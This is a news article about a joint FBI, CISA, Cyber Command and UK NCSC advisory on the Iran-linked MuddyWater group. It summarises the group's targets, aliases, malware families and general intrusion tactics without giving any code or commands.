Security agencies announce they have detected new campaigns by MuddyWater against a “range of government and private-sector organizations”
US and UK security agencies issued a joint warning on Thursday regarding new espionage and disruption campaigns attributed to MuddyWater, a prolific APT group recently declared by the US Cyber as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).
According to the warning, issued by the FBI, CISA, the US Cyber Command National Mission Force (CNMF,) and the UK’s National Cyber Security Centre (NSCS-UK), the group has been targeting a “range of government and private-sector organizations across sectors – including telecommunications, defense, local government, and oil and natural gas – in Asia, Africa, Europe, and North America.”
“MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware,” says the warning, which goes on to mention that this threat actor maintains “persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions.”
“Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners,” tweeted CISA Director, Jen Easterly. “Our latest advisory provides details on Iranian government-sponsored APT actors known as MuddyWater.”
First noticed in 2017, MuddyWater – also known by the names Earth Vetala, MERCURY, TEMP.Zagros and Statin Kitten – is one of the most widely researched cyber threat groups. Operating mainly against targets in the Middle East, its main goal is believed to be espionage and intelligence gathering, and it is known for attacking targets in the Middle East and Asia. It employs various malwares such as PowGoop, Canopy, Mori, and others, some custom-made.
MuddyWater’s MO generally starts with gathering the victim’s identity information using specific targeting and spear phishing, then deploying the malware and sending targeted emails with malicious links. According to the warning, the group uses scheduled tasks to establish persistence, as well as various techniques to bypass user account control and evade defense measures.